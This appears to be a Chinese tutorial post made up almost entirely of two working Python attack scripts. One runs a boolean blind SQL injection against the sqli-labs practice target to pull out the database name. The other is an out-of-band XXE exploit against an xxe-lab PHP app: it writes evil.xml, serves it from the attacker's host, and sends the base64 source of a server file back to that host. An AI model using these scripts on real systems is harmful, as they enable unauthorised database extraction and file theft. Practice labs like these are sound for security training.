python编写sql注入&xml注入工具

python编写sql盲注注入脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests  #导入request模块

url = 'http://192.168.181.138/sqli-labs-master/Less-8/?id=1%s'
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'}  #定义请求header头
check_data=list('1234567890abcdefghijklmnopqrstuzwxyz@')  
print("SQL Injection for MySQL!")
l = "' and length(database())=%s and '1'='1"            #定义注入语句
st = "' and substr(database(),%s,1)='%s'and '1'='1"     #定义注入语句
user = ""
for i in range(0,20):
    sql = l % str(i)        #payload拼接
    judge1 = requests.get(url % sql,headers=headers,timeout=30)
    if judge1.content.find(b"You are in...........") != -1:   #判断页面回显
        length = i
        print(i)
        break

for k in range(1,i+1):
    for ss in check_data:
        str_user = st % (str(k),str(ss))
        judge2 = requests.get(url % str_user,headers=headers,timeout = 30)
        if judge2.content.find(b"You are in...........") != -1:
            user = user + ss


print(user)

python编写xml注入脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from http.server import HTTPServer,CGIHTTPRequestHandler
import threading
import requests


def web_server():
    port = 3344
    httpd = HTTPServer(('',port),CGIHTTPRequestHandler)
    print("[*] Starting simple_httpd on port:",httpd.server_port)
    httpd.serve_forever()

def send_data():
    files = 'C:/web/PHPTutorial/WWW/xxe-lab-master/php_xxe/doLogin.php'
    data = "<?xml version=\"1.0\"?>\r\n<!DOCTYPE test [\r\n<!ENTITY % file SYSTEM \"php://filter/read=convert.base64-encode/resource=C:/web/PHPTutorial/WWW/xxe-lab-master/php_xxe/doLogin.php\">\r\n<!ENTITY % dtd SYSTEM \"http://192.168.181.128/evil.xml\" >\r\n%dtd;\r\n%send;\r\n]>"
    requests.post("http://192.168.181.138/xxe-lab-master/php_xxe/",data=data)
    files = input("Write filename")

if __name__ == '__main__':
    file = open('evil.xml','w')
    file.write("<!ENTITY % payload \"<!ENTITY &#x25; send SYSTEM 'HTTP://192.168.181.128/?content=%file;'>\"> %payload;")
    file.close()
    t1 = threading.Thread(target=web_server)
    t1.start()
    t2 = threading.Thread(target=send_data)
    t2.start()